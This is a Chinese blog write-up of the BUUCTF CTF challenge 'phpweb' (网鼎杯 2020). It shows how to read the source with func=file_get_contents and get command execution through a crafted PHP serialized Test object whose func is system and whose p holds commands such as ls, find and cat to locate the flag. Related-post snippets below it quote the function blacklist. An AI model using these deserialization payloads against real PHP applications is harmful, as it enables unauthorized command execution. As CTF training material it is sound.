BUUCTF—[网鼎杯 2020 朱雀组]phpweb

于 2024-09-04 10:39:00 发布
阅读量578 收藏 4
点赞数 10
分类专栏: CTF 文章标签: 反序列化 网鼎杯
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2301_76227305/article/details/141885618
版权

题解

打开题目是这样子的。

啥也不管抓个包看看,从它返回的信息判断出func后面的是要调用的函数,p后面的是要执行的内容。

那我们直接执行个系统命令看看,可以看到返回了hack,估计是做了过滤。

func=system&p=ls

直接读取源码看看咯,可以看到过滤了好多函数,反正我认识的可以进行命令执行的函数都给禁了。

func=file_get_contents&p=index.php

但是它没有禁用反序列化函数,那么我们只要实现构造出要执行的命令,然后序列化。再调用反序列化函数将其还原,且执行命令不就行了吗。从源代码不难看出传参的是这一部分代码,我们照葫芦画瓢,对其进行序列化。

class Test {
        var $p = "cat /flag";
        var $func = "system";
        function __destruct() {
            if ($this->func != "") {
                echo gettime($this->func, $this->p);
            }
        }
    }

运行下面代码。

<?php
class Test {
        var $p = "cat /flag";
        var $func = "system";
        function __destruct() {
            if ($this->func != "") {
                echo gettime($this->func, $this->p);
            }
        }
    }
$a = new Test();
echo serialize($a);
?>

得到序列化后的数据。

O:4:"Test":2:{s:1:"p";s:2:"ls";s:4:"func";s:6:"system";}

执行成功,返回当前目录下面的文件。

直接查到flag在哪里,发现 /tmp/flagoefiu4r93这个文件比较可以,估计是这个啦。

O:4:"Test":2:{s:1:"p";s:20:"find / -name 'flag*'";s:4:"func";s:6:"system";}

直接查看这个文件,但是这里我是cat /tmp/flagoefiu4r93,不知道为啥不行,有知道的大佬可以指点一下。

O:4:"Test":2:{s:1:"p";s:23:"cat /tmp/flagoefiu4r93'";s:4:"func";s:6:"system";}

用这个readfile函数读取,这个是PHP自带的函数,成功读取。

func=readfile&p=/tmp/flagoefiu4r93

总结

主要涉及的知识是反序列的运用,要懂得构造出序列化的数据,还得想到用file_get_contents函数读取源码。

脸红ฅฅ*的思春期
关注
专栏目录
phpweb-[网鼎杯 2020 朱雀]-[BUUCTF]
qwsn
11-23 2001
0x01、Web 1.phpweb-[网鼎杯 2020 朱雀]-[传送门->BUUCTF] 第一步:点击传送门,打开题目环境 观察题目页面: //打开网页观察网页显示动态,发现网页每隔一段时间会刷新一下,说明可能自动间隔一段时间刷新一次,观察网页,网页上会显示一段warning信息,并提示了data()函数。 //利用BurpSuite拦截网页,看一下有什么异常。观察发现网页会传递两个参数,func和p。func对应的值为date,p对应的值为一串时间格式,说明网页可能向后端传递函数名及其对应的参数
[网鼎杯 2020 朱雀]phpweb 待续
zxnimud5的专栏
09-13 530
抓包看参数 联想到函数 读index.php代码 func=file_get_contents&p=index.php <?php $disable_fun = array("exec","shell_exec","system","passthru","proc_open","show_source","phpinfo","popen","dl","eval","proc_terminate","touch","escapeshellcmd","escapesh...
BUUCTF:[网鼎杯 2020 朱雀]phpweb
weixin_74911687的博客
03-05 163
BUUCTF:[网鼎杯 2020 朱雀]phpweb
BUUCTF:[网鼎杯 2020 朱雀]phpweb-------细致猜测,绕过黑名单,
Zero_Adam的博客
02-15 548
目录:缺点&&不足WP方法一、反序列化绕过方法二:命名空间绕过黑名单: 缺点&&不足 抓包不细致,这个题,我抓到了第一个包,没有看到第二个包。 没有注意到data可能是个函数,没有进一步去网上查找函数, 要时时刻刻注意warning的字样,注意报错信息 WP 抓包, 貌似,date是个函数啊。随便一改,又有报错,而且是 call_users_func。这个在做那个啥杯的时候学习过了,不错的函数 还是先复习一下call_users_func怎么用吧,,这不就找到了么。只写
buuctf刷题日记 [网鼎杯 2020 朱雀]phpweb 1
weixin_45642610的博客
03-04 297
buuctf刷题日记 [网鼎杯 2020 朱雀]phpweb 1 看源码,扫后台没有什么信息。抓包后看见 func=date&p=Y-m-d+h%3Ai%3As+a 很像date()函数的运用方法,p的参数类似data()的参数。 返回时间日期等,调用func的函数date(),以p的内容作为函数参数,就是call_user_func()函数的用法。 构造payload获取index.php源码 func=file_get_contents&p=index.php <?php
[网鼎杯 2020 朱雀]phpweb 1
qq_43618536的博客
07-21 645
[网鼎杯 2020 朱雀]phpweb 1
2020网鼎杯朱雀题目.rar
05-20
含有misc,re,crypto,pwn,webweb题为thinkjava
2022网鼎杯初赛朱雀赛题
10-18
2022网鼎杯初赛朱雀赛题
[网鼎杯 2020 朱雀]phpweb1解题思路
最新发布
xiyuanyue的博客
10-09 196
5、禁用函数未禁用unserialize反序列化函数,构建Test 序列化,O:4:"Test":2:{s:1:"p";s:4:"func";猜测flag 在当前目录的flag.php文件 或者根目录的flag中func=readfile&p=/var/www/html/flag.php func=readfile&p=/var/www/html/flag func=readfile&p=/../.../.../flag均返回无此文件。
【学习笔记 47】 buu [网鼎杯 2020 朱雀]phpweb
weixin_43553654的博客
08-09 390
0x00 知识点 readfile函数读取文件 反序列化实现命令执行 0x01 知识点详解 什么是readfile函数? 答:readfile() 函数读取一个文件,并写入到输出缓冲。 如果成功,该函数返回从文件中读入的字节数。如果失败,该函数返回 FALSE 并附带错误信息。您可以通过在函数名前面添加一个 ‘@’ 来隐藏错误输出。 什么是反序列化? 答: 可以去看看我之前的文章 <?php $disable_fun = array("exec","shell_exec","syste
buuctf-[网鼎杯 2020 朱雀]phpweb
2202_75317918的博客
09-21 373
buuctf-[网鼎杯 2020 朱雀]phpweb
BUUCTF_Web——[网鼎杯 2020 朱雀]phpweb
Ho1aAs‘s Blog
10-17 634
文章目录解题思路完 解题思路 打开环境,等待一段时间报错 审查源码,发现POST请求,页面也会定时刷新,这里POST了一个函数和变量 在hackbar加载URL 此处将需要运行的函数赋值给func,参数赋值给p,然后POST在服务器执行 那么首先审查网页的php源码 highlight_file(index.php) 得到源码如下: <!DOCTYPE html> <html> <head> <title>phpweb</title&g
BUUCTF——phpweb
weixin_45864041的博客
04-17 656
打开题目 可以看到页面上的时间每5秒刷新一次,所以我们直接抓包看页面的数据提交 由页面提交的两个参数可以看到,第一个func是函数名,第二个是传入函数的参数。 所以可以用php的readfile()函数读取index.php的源码。 <?php $disable_fun = array("exec","shell_exec","system","passthru", "proc_open","show_source","phpinfo","popen","dl","eval", "
Buuctf PHPweb
weixin_51313108的博客
09-07 399
PHPWeb考点WP 考点 PHP回调函数 反序列化代码执行 系统命令执行(find查找文件) 参考连接:PHP命令执行&代码执行 WP 页面读取不到什么信息,抓个包看到传了俩个参数 func,p。猜测可能是function和parameter。 试试一下查看源代码 <?php $disable_fun = array("exec","shell_exec","system","passthru","proc_open","show_source","phpinfo","
【随笔】buuctf-phpweb
m0_62593857的博客
01-17 228
buuctf-phpweb
BUUCTF WEB [网鼎杯 2020 朱雀]phpweb
Y1da的博客
04-27 388
BUUCTF WEB [网鼎杯 2020 朱雀]phpweb 进入环境,发现调用了date()函数,抓包后发现POST传参存在名为func,值为date的变量 尝试修改func变量 func=echo&p=Y-m-d+h%3Ai%3As+a 回显 Warning : call_user_func() expects parameter 1 to be a valid callback, function 'echo' not found or invalid function nam
[网鼎杯 2020 朱雀]phpweb
03-16
phpweb是一种基于PHP语言开发的Web应用程序框架,它提供了一系列的工具和函数库,使得开发者可以更加高效地构建Web应用程序。phpweb具有易于学习、易于使用、易于扩展等特点,因此在Web应用程序开发中得到了广泛的应用。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值